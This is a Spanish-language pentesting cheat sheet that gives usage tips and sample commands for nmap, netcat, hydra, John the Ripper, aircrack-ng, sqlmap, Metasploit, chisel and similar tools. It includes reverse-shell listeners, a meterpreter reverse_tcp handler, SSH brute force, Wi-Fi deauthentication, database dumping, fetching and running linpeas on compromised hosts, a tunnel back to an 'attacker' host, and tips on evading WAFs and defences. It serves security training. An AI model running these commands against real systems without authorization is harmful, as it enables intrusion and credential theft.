nmap
Escáner de red imprescindible para descubrir hosts, puertos y servicios antes de atacar.
- Cuándo usarlo: fase de reconocimiento activo y validación de superficie de ataque.
- Flags clave:
-sC ejecuta scripts NSE básicos, -sV detecta versiones, -oN guarda resultados en texto.
- Consejo: empieza con un barrido rápido
-T4 y luego afina con scripts específicos (--script vuln).
nmap -sC -sV -T4 -oN escaneo.txt 192.168.1.0/24
netcat
Herramienta multiuso para crear sockets TCP/UDP, transferir archivos y establecer shells reversos.
- Cuándo usarlo: pruebas rápidas de conectividad, tunelización temporal y escucha de puertos.
- Truco: combina
nc con /bin/bash para abrir shells remotos o con pv para copiar ficheros grandes.
- Seguridad: usa versiones con opción
-e solo en laboratorios controlados.
nc -lvnp 9001 # escucha interactiva
nc 10.10.10.5 9001 -v # conexión desde el atacante
hydra
Lanzador de fuerza bruta paralela que soporta más de 50 protocolos para romper credenciales débiles.
- Cuándo usarlo: tras enumerar usuarios válidos (SMTP, SSH, FTP, HTTP-Auth).
- Flags clave:
-L/-l lista/usuario, -P/-p diccionario/clave, -t hilos concurrentes.
- Consejo: limita intentos con
-W para no disparar mecanismos de defensa y registra resultados con -o.
hydra -L users.txt -P pass.txt -t 4 ssh://10.0.0.7
john the ripper
Framework de cracking que acepta múltiples formatos de hash y permite reglas personalizadas.
- Cuándo usarlo: post-explotación para romper hashes de
/etc/shadow o volcados de AD.
- Pasos: 1) convertir con
john --format o zip2john, 2) lanzar diccionario, 3) aplicar reglas incrementales.
- Consejo: revisa el progreso con
john --status y muestra resultados con john --show hashes.txt.
john --wordlist=rockyou.txt --rules=best64 hashes.txt
tcpdump
Sniffer ligero para capturar paquetes y filtrar protocolos sin necesidad de un GUI pesado como Wireshark.
- Cuándo usarlo: análisis en vivo, respuesta rápida o cuando solo tienes acceso vía consola.
- Filtros útiles:
port 80, host 10.10.10.5, tcp[tcpflags] & tcp-syn != 0.
- Consejo: guarda capturas con
-w para revisarlas luego con Wireshark y usa -nn para ver puertos/IP sin resolver.
sudo tcpdump -i wlan0 -nn port 80 -w captura.pcap
airmon-ng & aireplay-ng
Parte de Aircrack-ng, permiten poner tu tarjeta Wi-Fi en modo monitor y forzar handshakes WPA/WPA2.
- Cuándo usarlo: auditorías inalámbricas, verificación de configuraciones y recopilación de handshakes.
- Flujo rápido: 1) habilita modo monitor, 2) captura tráfico con
airodump-ng, 3) desautentica clientes con aireplay-ng.
- Consejo: usa antenas con buen dBi, controla la potencia con
txpower y documenta el canal antes de lanzar ataques.
sudo airmon-ng start wlan0
sudo aireplay-ng -0 10 -a <BSSID> -c <CLIENTE> wlan0mon
gobuster
Fuzzer de rutas y subdominios que ayuda a encontrar paneles ocultos y buckets expuestos.
- Modos:
dir para directorios, dns para subdominios, vhost para virtual hosts.
- Consejo: combina diccionarios específicos (raft-small) y cabeceras personalizadas para evadir WAF.
- Flag útil:
-x php,txt,conf fuerza extensiones comunes.
gobuster dir -u https://target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
sqlmap
Automatiza la explotación de inyecciones SQL, exfiltra datos y obtiene shells.
- Cuándo usarlo: tras detectar parámetros sospechosos (
id=1, formularios).
- Flags clave:
--batch modo automático, --dump extrae tablas, --os-shell intenta una shell.
- Consejo: utiliza
--risk y --level gradualmente para no saturar el servidor.
sqlmap -u "https://target/app.php?id=2" --cookie="PHPSESSID=xyz" --risk=2 --level=3 --dump
metasploit-framework
Suite modular con exploits, payloads y post módulos para automatizar escenarios complejos.
- Cuándo usarlo: cuando necesitas exploits listos para CVEs conocidos o pivoting rápido.
- Workflow:
search → use → set RHOSTS/set LHOST → run.
- Consejo: crea recursos
.rc para repetir sesiones y mantén tu base actualizada con msfupdate.
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 9001; run"
burp suite
Proxy interceptador para pruebas web; permite manipular peticiones, automatizar scans y extender con BApps.
- Cuándo usarlo: testeo de APIs, sesiones y validaciones de inputs.
- Tips: usa
Repeater para fuzz manual, Intruder para ataques controlados y guarda perfiles de scope.
- Alternativa CLI:
burp suite community combinada con ffuf y curl.
java -jar burpsuite_community.jar
wireshark / tshark
Analizadores de tráfico con filtros potentes para entender protocolos y detectar fugas.
- Tshark: versión CLI ideal para servidores o automatización.
- Filtros:
http.request.method == "POST", ssl.handshake, dns.qry.name contains "admin".
- Consejo: exporta flujos con
Export Objects o tshark -z follow,tcp,ascii,NUM.
tshark -i eth0 -Y "http.request" -w http_capture.pcap
linpeas.sh
Script de post-explotación que enumera privilegios, binarios SUID y configuraciones débiles en Linux.
- Cuándo usarlo: luego de obtener acceso a un host y querer escalar privilegios.
- Tip: ejecútalo con
sh linpeas.sh | tee linpeas.log para guardar todo.
- Respeta: limpia cualquier descarga que dejes en la máquina auditada.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
chisel
Túnel TCP basado en WebSockets para pivotar a redes internas cuando solo tienes salida HTTP/HTTPS.
- Uso típico: inicia servidor en tu host, cliente en la máquina comprometida.
- Modos:
--reverse abre puertos desde dentro hacia fuera.
- Alternativa:
ssh -R o sshuttle si tienes credenciales válidas.
# atacante
./chisel server -p 8000 --reverse
# víctima comprometida
./chisel client attacker:8000 R:1080:sockspy